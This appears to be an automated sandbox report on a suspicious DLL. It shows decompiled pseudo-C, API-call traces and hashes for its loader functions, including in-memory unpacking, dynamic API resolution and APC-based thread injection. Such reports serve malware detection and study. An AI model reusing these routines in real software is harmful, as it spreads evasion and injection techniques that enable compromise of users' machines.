Opcode Fuzzy Hash: e36a0bd32e5b9ba88dacceae2b476c4d98f00c162acfd76061a148571915bf4d
Instruction Fuzzy Hash: 3B3114B1A0520ADFDB04CF69C980AAEB7F4FF55355B10416AD811EB280E774EAA4CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6F252264, Relevance: .1, Instructions: 77
COMMONCrypto

Download Yara Rule

C-Code - Quality: 71%

			E6F252264(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E6F2523CB(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E6F252485(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E6F252370(_t55, _t66);
										_t89 = _t66 + 0x10;
										E6F2523CB(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E6F252467(_t82[2], 1);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])();
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}

0x6f252268
0x6f252269
0x6f25226a
0x6f25226d
0x6f25226f
0x6f252272
0x6f252273
0x6f252275
0x6f252276
0x6f252277
0x6f25227a
0x6f252284
0x6f252335
0x6f25233c
0x6f252345
0x6f25228a
0x6f25228a
0x6f252290
0x6f252296
0x6f252299
0x6f25229c
0x6f2522a0
0x6f2522a5
0x6f2522aa
0x6f25232a
0x00000000
0x6f2522ac
0x6f2522ac
0x6f2522b8
0x6f2522ba
0x6f252315
0x6f252315
0x6f25231b
0x00000000
0x6f2522bc
0x6f2522cb
0x6f2522cd
0x6f2522ce
0x6f2522cf
0x6f2522d2
0x6f2522d2
0x6f2522d4
0x00000000
0x6f2522d6
0x6f2522d6
0x6f252320
0x6f2522d8
0x6f2522d8
0x6f2522dc
0x6f2522e4
0x6f2522e9
0x6f2522ee
0x6f2522fa
0x6f252302
0x6f252309
0x6f25230f
0x6f252313
0x00000000
0x6f252313
0x6f2522d6
0x6f2522d4
0x00000000
0x6f2522ba
0x6f25232e
0x6f25232e
0x6f25232e
0x6f2522aa
0x6f25234a
0x6f252351

Memory Dump Source

Source File: 00000000.00000002.878604133.000000006F251000.00000020.00020000.sdmp, Offset: 6F250000, based on PE: true

Associated: 00000000.00000002.878583906.000000006F250000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.878633029.000000006F253000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.878661607.000000006F255000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.878711212.000000006F256000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction ID: 310cce33bd5cff7dd76186f29512c1a3ea01477f737c46ae83c8d85d4ad1e8f3
Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
Instruction Fuzzy Hash: 4021B6B2900209ABDB10DF68C8809ABBBA5FF49350F4581A9D915DB2C5D734FA25CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 6F27DD49, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.878975805.000000006F27D000.00000040.00020000.sdmp, Offset: 6F27D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction ID: 0dc28b7903aae2a8cf5209740403652adced0935e708abcb454a27485fbc54d9
Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction Fuzzy Hash: 571196733442059FD724CE99DC90EA273DAEB89230B558196ED04CB315DB36E841CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6F27E142, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.878975805.000000006F27D000.00000040.00020000.sdmp, Offset: 6F27D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
Instruction ID: 6eea41e0cc8cebe1e6f1bf7d41bfa26033d515cbf4dae437aab72a8c3b16021a
Opcode Fuzzy Hash: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
Instruction Fuzzy Hash: 0401227235450A8FE724CB2CD982DF9B7E4EBC2330B15807EC40283615D530E841CE30

Uniqueness

Uniqueness Score: -1.00%

Function 6F251979, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E6F251979(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L6F252210();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x6f2541d0;
				_push(_t15 + 0x6f25505e);
				_push(_t15 + 0x6f255054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L6F25220A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t34 = CreateFileMappingW(0xffffffff, 0x6f2541c0, 4, 0, _t18,  &_v60);
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0);
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x6f251979
0x6f251982
0x6f251986
0x6f25198c
0x6f251991
0x6f251996
0x6f251999
0x6f25199c
0x6f2519a1
0x6f2519a2
0x6f2519a5
0x6f2519b0
0x6f2519b7
0x6f2519bb
0x6f2519bd
0x6f2519be
0x6f2519c1
0x6f2519c6
0x6f2519d0
0x6f2519d2
0x6f2519d2
0x6f2519ec
0x6f2519f0
0x6f251a40
0x6f2519f2
0x6f2519fb
0x6f251a11
0x6f251a19
0x6f251a2b
0x6f251a2f
0x00000000
0x00000000
0x6f251a1b
0x6f251a1e
0x6f251a23
0x6f251a25
0x6f251a25
0x6f251a06
0x6f251a08
0x6f251a31
0x6f251a32
0x6f251a32
0x6f2519fb
0x6f251a48

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,6F25176E,0000000A,?,?), ref: 6F251986
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6F25199C
_snwprintf.NTDLL ref: 6F2519C1
CreateFileMappingW.KERNEL32(000000FF,6F2541C0,00000004,00000000,?,?), ref: 6F2519E6
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6F25176E,0000000A,?), ref: 6F2519FD
MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 6F251A11
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6F25176E,0000000A,?), ref: 6F251A29
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6F25176E,0000000A), ref: 6F251A32
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6F25176E,0000000A,?), ref: 6F251A3A

Memory Dump Source

Source File: 00000000.00000002.878604133.000000006F251000.00000020.00020000.sdmp, Offset: 6F250000, based on PE: true

Associated: 00000000.00000002.878583906.000000006F250000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.878633029.000000006F253000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.878661607.000000006F255000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.878711212.000000006F256000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1724014008-0
Opcode ID: fb1131780f6e1e0b7e31e9dfb999fa8847e7bf32cb40715216144bf4b3327b54
Instruction ID: dfd69c9af1aa78b20dfeab140cbebf89c36a2d9310e20292f492f827e8f2f0c5
Opcode Fuzzy Hash: fb1131780f6e1e0b7e31e9dfb999fa8847e7bf32cb40715216144bf4b3327b54
Instruction Fuzzy Hash: 422171B650021CBFDB11AFE8DC89E9E77A9FB49365F104126F611DB180D6709DA4CF60

Uniqueness

Uniqueness Score: -1.00%

Function 6F251AA5, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F251AA5(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E6F251C8F(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x6f2541d0 + 0x6f255014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x6f2541d0 + 0x6f2550e1);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E6F25136A(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x6f2541d0 + 0x6f2550f1);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x6f2541d0 + 0x6f255104);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x6f2541d0 + 0x6f255119);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x6f2541d0 + 0x6f25512f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E6F2518D1(_t56, _a12);
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x6f251ab3
0x6f251ab7
0x6f251b78
0x6f251abd
0x6f251ad5
0x6f251ae4
0x6f251aeb
0x6f251aef
0x6f251af2
0x6f251b70
0x6f251b71
0x6f251af4
0x6f251b01
0x6f251b05
0x6f251b08
0x00000000
0x6f251b0a
0x6f251b17
0x6f251b1b
0x6f251b1e
0x00000000
0x6f251b20
0x6f251b2d
0x6f251b31
0x6f251b34
0x00000000
0x6f251b36
0x6f251b43
0x6f251b47
0x6f251b4a
0x00000000
0x6f251b4c
0x6f251b52
0x6f251b58
0x6f251b5d
0x6f251b64
0x6f251b67
0x00000000
0x6f251b69
0x6f251b6c
0x6f251b6c
0x6f251b67
0x6f251b4a
0x6f251b34
0x6f251b1e
0x6f251b08
0x6f251af2
0x6f251b86

APIs

Part of subcall function 6F251C8F: HeapAlloc.KERNEL32(00000000,?,6F25117D,?,00000000,00000000,?,?,?,6F251810), ref: 6F251C9B

GetModuleHandleA.KERNEL32(?,00000020,00000002,?,?,?,?,6F251272,?,?,?,?,00000002,00000000,?,?), ref: 6F251AC9
GetProcAddress.KERNEL32(00000000,?), ref: 6F251AEB
GetProcAddress.KERNEL32(00000000,?), ref: 6F251B01
GetProcAddress.KERNEL32(00000000,?), ref: 6F251B17
GetProcAddress.KERNEL32(00000000,?), ref: 6F251B2D
GetProcAddress.KERNEL32(00000000,?), ref: 6F251B43

Part of subcall function 6F2518D1: memset.NTDLL ref: 6F251950

Memory Dump Source

Source File: 00000000.00000002.878604133.000000006F251000.00000020.00020000.sdmp, Offset: 6F250000, based on PE: true

Associated: 00000000.00000002.878583906.000000006F250000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.878633029.000000006F253000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.878661607.000000006F255000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.878711212.000000006F256000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocHandleHeapModulememset
String ID:
API String ID: 426539879-0
Opcode ID: 7768664be4c8dff304b7e7ff4a0a974dbcb024f0c284e8aca2bdfe26c034a469
Instruction ID: fb1d005e9b641c439ab382ba61ea6aad72f86f0e1cd73cb1c5051ee19d1f1a6e
Opcode Fuzzy Hash: 7768664be4c8dff304b7e7ff4a0a974dbcb024f0c284e8aca2bdfe26c034a469
Instruction Fuzzy Hash: 37213BB160070EAFDB50DF69C894E5A7BECFF09298B008526E815CB611E734E975CFA0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 6396 Parent PID: 6376 rundll32.exeCOMMON

Executed Functions

Function 6F27E20C, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,000007D2,00003000,00000040,000007D2,6F27DC60), ref: 6F27E2C9
VirtualAlloc.KERNEL32(00000000,000001FF,00003000,00000040,6F27DCC5), ref: 6F27E300
VirtualAlloc.KERNEL32(00000000,0000CF29,00003000,00000040), ref: 6F27E360
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6F27E396
VirtualProtect.KERNEL32(6F250000,00000000,00000004,6F27E1EB), ref: 6F27E49B
VirtualProtect.KERNEL32(6F250000,00001000,00000004,6F27E1EB), ref: 6F27E4C2
VirtualProtect.KERNEL32(00000000,?,00000002,6F27E1EB), ref: 6F27E58F
VirtualProtect.KERNEL32(00000000,?,00000002,6F27E1EB,?), ref: 6F27E5E5
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6F27E601

Memory Dump Source

Source File: 00000003.00000002.880156401.000000006F27D000.00000040.00020000.sdmp, Offset: 6F27D000, based on PE: false

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: 89be4732768a5fdfa74a40c0d296f5c4b222d702245eba6b4d295f32b631076c
Instruction ID: 11dc213945a6b27514c75e40f523ef1bb7274d0543d817c0c950f78992415988
Opcode Fuzzy Hash: 89be4732768a5fdfa74a40c0d296f5c4b222d702245eba6b4d295f32b631076c
Instruction Fuzzy Hash: 6AD16DB22006069FDB21CF94C880F9577A6FF48314B195196ED19AF7DADB70B80ECB60

Uniqueness

Uniqueness Score: -1.00%

Function 6F2517A7, Relevance: 15.1, APIs: 10, Instructions: 103
threadsleepsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E6F2517A7(intOrPtr _a4) {
				char _v28;
				struct _SYSTEMTIME _v44;
				char _v48;
				long _v52;
				long _v56;
				void* __edi;
				long _t21;
				int _t23;
				long _t26;
				long _t27;
				long _t31;
				intOrPtr _t39;
				intOrPtr _t44;
				signed int _t45;
				void* _t50;
				signed int _t54;
				void* _t56;
				intOrPtr* _t57;

				_t21 = E6F25146C();
				_v52 = _t21;
				if(_t21 != 0) {
					L18:
					return _t21;
				} else {
					goto L1;
				}
				do {
					L1:
					GetSystemTime( &_v44);
					_t23 = SwitchToThread();
					asm("cdq");
					_t45 = 9;
					_t54 = _t23 + (_v44.wMilliseconds & 0x0000ffff) % _t45;
					_t26 = E6F2515A3(0, _t54); // executed
					_v56 = _t26;
					Sleep(_t54 << 5); // executed
					_t21 = _v56;
				} while (_t21 == 0xc);
				if(_t21 != 0) {
					goto L18;
				}
				_t27 = E6F251C12(_t45);
				_v52 = _t27;
				if(_t27 != 0) {
					L16:
					_t21 = _v52;
					if(_t21 == 0xffffffff) {
						_t21 = GetLastError();
					}
					goto L18;
				}
				if(_a4 != 0) {
					L11:
					_push(0);
					_t56 = E6F251CA4(E6F2516EC,  &_v28);
					if(_t56 == 0) {
						_v56 = GetLastError();
					} else {
						_t31 = WaitForSingleObject(_t56, 0xffffffff);
						_v56 = _t31;
						if(_t31 == 0) {
							GetExitCodeThread(_t56,  &_v56);
						}
						CloseHandle(_t56);
					}
					goto L16;
				}
				if(E6F251D7C(_t45,  &_v48) != 0) {
					 *0x6f2541b8 = 0;
					goto L11;
				}
				_t44 = _v48;
				_t57 = __imp__GetLongPathNameW;
				_t50 =  *_t57(_t44, 0, 0);
				if(_t50 == 0) {
					L9:
					 *0x6f2541b8 = _t44;
					goto L11;
				}
				_t15 = _t50 + 2; // 0x2
				_t39 = E6F251C8F(_t50 + _t15);
				 *0x6f2541b8 = _t39;
				if(_t39 == 0) {
					goto L9;
				} else {
					 *_t57(_t44, _t39, _t50);
					E6F25136A(_t44);
					goto L11;
				}
			}

APIs

Part of subcall function 6F25146C: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6F2517B8,747863F0,00000000), ref: 6F25147B
Part of subcall function 6F25146C: GetVersion.KERNEL32 ref: 6F25148A
Part of subcall function 6F25146C: GetCurrentProcessId.KERNEL32 ref: 6F251499
Part of subcall function 6F25146C: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6F2514B2

GetSystemTime.KERNEL32(?,747863F0,00000000), ref: 6F2517CB
SwitchToThread.KERNEL32 ref: 6F2517D1

Part of subcall function 6F2515A3: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,00000000,00000000), ref: 6F2515F9
Part of subcall function 6F2515A3: memcpy.NTDLL(?,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,6F2517EC), ref: 6F25168B
Part of subcall function 6F2515A3: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00000000,00000000), ref: 6F2516A6

Sleep.KERNELBASE(00000000,00000000), ref: 6F2517F4
GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 6F25183C
GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 6F25185A
WaitForSingleObject.KERNEL32(00000000,000000FF,6F2516EC,?,00000000), ref: 6F25188C
GetExitCodeThread.KERNEL32(00000000,?), ref: 6F2518A0
CloseHandle.KERNEL32(00000000), ref: 6F2518A7
GetLastError.KERNEL32(6F2516EC,?,00000000), ref: 6F2518AF
GetLastError.KERNEL32 ref: 6F2518C2

Memory Dump Source

Source File: 00000003.00000002.879914739.000000006F251000.00000020.00020000.sdmp, Offset: 6F250000, based on PE: true

Associated: 00000003.00000002.879879175.000000006F250000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.879960105.000000006F253000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.880000556.000000006F255000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.880035298.000000006F256000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastLongNamePathProcessThreadVirtual$AllocCloseCodeCreateCurrentEventExitFreeHandleObjectOpenSingleSleepSwitchSystemTimeVersionWaitmemcpy
String ID:
API String ID: 2280543912-0
Opcode ID: 17a82ba9deb30d0df6486a4bb9ae92c6c74302d90558842b6bc742c5c9987df2
Instruction ID: b69e7082c13fbdf9bd070d73911e011c6e70d886ef81916287f579fea1348251
Opcode Fuzzy Hash: 17a82ba9deb30d0df6486a4bb9ae92c6c74302d90558842b6bc742c5c9987df2
Instruction Fuzzy Hash: 2F318171804B1A9BE720DF658C4CA5B77EDFE86765F100A2AF460C6580E730D9B4CEA2

Uniqueness

Uniqueness Score: -1.00%

Function 6F251E04, Relevance: 9.1, APIs: 6, Instructions: 71
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x6f254188);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x6f25418c;
						if( *0x6f25418c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x6f254198;
								if( *0x6f254198 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x6f25418c);
						}
						HeapDestroy( *0x6f254190);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x6f254188) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						_t41 = _t18;
						 *0x6f254190 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x6f2541b0 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E6F251CA4(E6F251D32, E6F251EE0(_a12, 1, 0x6f254198, _t41));
							 *0x6f25418c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}

APIs

InterlockedIncrement.KERNEL32(6F254188), ref: 6F251E26
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 6F251E3B

Part of subcall function 6F251CA4: CreateThread.KERNELBASE ref: 6F251CBB
Part of subcall function 6F251CA4: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6F251CD0
Part of subcall function 6F251CA4: GetLastError.KERNEL32(00000000), ref: 6F251CDB
Part of subcall function 6F251CA4: TerminateThread.KERNEL32(00000000,00000000), ref: 6F251CE5
Part of subcall function 6F251CA4: CloseHandle.KERNEL32(00000000), ref: 6F251CEC
Part of subcall function 6F251CA4: SetLastError.KERNEL32(00000000), ref: 6F251CF5

InterlockedDecrement.KERNEL32(6F254188), ref: 6F251E8E
SleepEx.KERNEL32(00000064,00000001), ref: 6F251EA8
CloseHandle.KERNEL32 ref: 6F251EC4
HeapDestroy.KERNEL32 ref: 6F251ED0

Memory Dump Source

Source File: 00000003.00000002.879914739.000000006F251000.00000020.00020000.sdmp, Offset: 6F250000, based on PE: true

Associated: 00000003.00000002.879879175.000000006F250000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.879960105.000000006F253000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.880000556.000000006F255000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.880035298.000000006F256000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
String ID:
API String ID: 2110400756-0
Opcode ID: 08ffc445b09e98901abaebe9750fc4c985a92004ca3bf78ee48198a346eccd6f
Instruction ID: 484232e61131cf30d304b07979df44bbc78230cb72e5aa98967b1edd8e2c3e45
Opcode Fuzzy Hash: 08ffc445b09e98901abaebe9750fc4c985a92004ca3bf78ee48198a346eccd6f
Instruction Fuzzy Hash: C7216D71A0071AEBCF019FA9CC89A5ABBB9FB563B6710812AF505D3580E7309DB4CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6F251CA4, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F251CA4(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x6f2541cc, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}

0x6f251cbb
0x6f251cc1
0x6f251cc5
0x6f251cd0
0x6f251cd8
0x6f251ce1
0x6f251ce5
0x6f251cec
0x6f251cf3
0x6f251cf5
0x6f251cfb
0x6f251cd8
0x6f251cff

APIs

CreateThread.KERNELBASE ref: 6F251CBB
QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6F251CD0
GetLastError.KERNEL32(00000000), ref: 6F251CDB
TerminateThread.KERNEL32(00000000,00000000), ref: 6F251CE5
CloseHandle.KERNEL32(00000000), ref: 6F251CEC
SetLastError.KERNEL32(00000000), ref: 6F251CF5

Memory Dump Source

Source File: 00000003.00000002.879914739.000000006F251000.00000020.00020000.sdmp, Offset: 6F250000, based on PE: true

Associated: 00000003.00000002.879879175.000000006F250000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.879960105.000000006F253000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.880000556.000000006F255000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.880035298.000000006F256000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
String ID:
API String ID: 3832013932-0
Opcode ID: cf66bec7701696b0b2c1dab7c8977c34e166aa27debf4903b82534ada93f69a5
Instruction ID: 890548389cec0daafd3e72fbf44da1d96217ec938fe4edcb33f600826be29a2b
Opcode Fuzzy Hash: cf66bec7701696b0b2c1dab7c8977c34e166aa27debf4903b82534ada93f69a5
Instruction Fuzzy Hash: 55F0FE77205B21BBDB125FA08C0DF5BBE6AFB1A762F005404F60591550C7218C39DF95

Uniqueness

Uniqueness Score: -1.00%

Function 6F2515A3, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6F2515A3(void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				unsigned int _v12;
				intOrPtr _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v36;
				signed int _v44;
				signed int _v48;
				intOrPtr _t39;
				void* _t46;
				intOrPtr _t47;
				intOrPtr _t50;
				signed int _t59;
				signed int _t61;
				intOrPtr _t66;
				intOrPtr _t77;
				void* _t78;
				signed int _t80;

				_t77 =  *0x6f2541b0;
				_t39 = E6F251A4B(_t77,  &_v20,  &_v12);
				_v16 = _t39;
				if(_t39 == 0) {
					asm("sbb ebx, ebx");
					_t59 =  ~( ~(_v12 & 0x00000fff)) + (_v12 >> 0xc);
					_t78 = _t77 + _v20;
					_v36 = _t78;
					_t46 = VirtualAlloc(0, _t59 << 0xc, 0x3000, 4); // executed
					_v24 = _t46;
					if(_t46 == 0) {
						_v16 = 8;
					} else {
						_t61 = 0;
						if(_t59 <= 0) {
							_t47 =  *0x6f2541cc;
						} else {
							_t66 = _a4;
							_t50 = _t46 - _t78;
							_t11 = _t66 + 0x6f255137; // 0x6f255137
							_v28 = _t50;
							_v32 = _t50 + _t11;
							_v8 = _t78;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t19 = _t61 + 1; // 0x2
								_t80 = _t19;
								E6F251D02(_v8 + _t50, _v8, (_v48 ^ _v44) + _v20 + _a4 >> _t80);
								_t64 = _v32;
								_v8 = _v8 + 0x1000;
								_t47 =  *((intOrPtr*)(_v32 + 0xc)) -  *((intOrPtr*)(_t64 + 8)) +  *((intOrPtr*)(_t64 + 4));
								_t61 = _t80;
								 *0x6f2541cc = _t47;
								if(_t61 >= _t59) {
									break;
								}
								_t50 = _v28;
							}
						}
						if(_t47 != 0x63699bc3) {
							_v16 = 0xc;
						} else {
							memcpy(_v36, _v24, _v12);
						}
						VirtualFree(_v24, 0, 0x8000); // executed
					}
				}
				return _v16;
			}

APIs

VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,00000000,00000000), ref: 6F2515F9
memcpy.NTDLL(?,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,6F2517EC), ref: 6F25168B
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00000000,00000000), ref: 6F2516A6

Strings

Mar 26 2021, xrefs: 6F25162B

Memory Dump Source

Source File: 00000003.00000002.879914739.000000006F251000.00000020.00020000.sdmp, Offset: 6F250000, based on PE: true

Associated: 00000003.00000002.879879175.000000006F250000.00000002.00020000.sdmp Download File
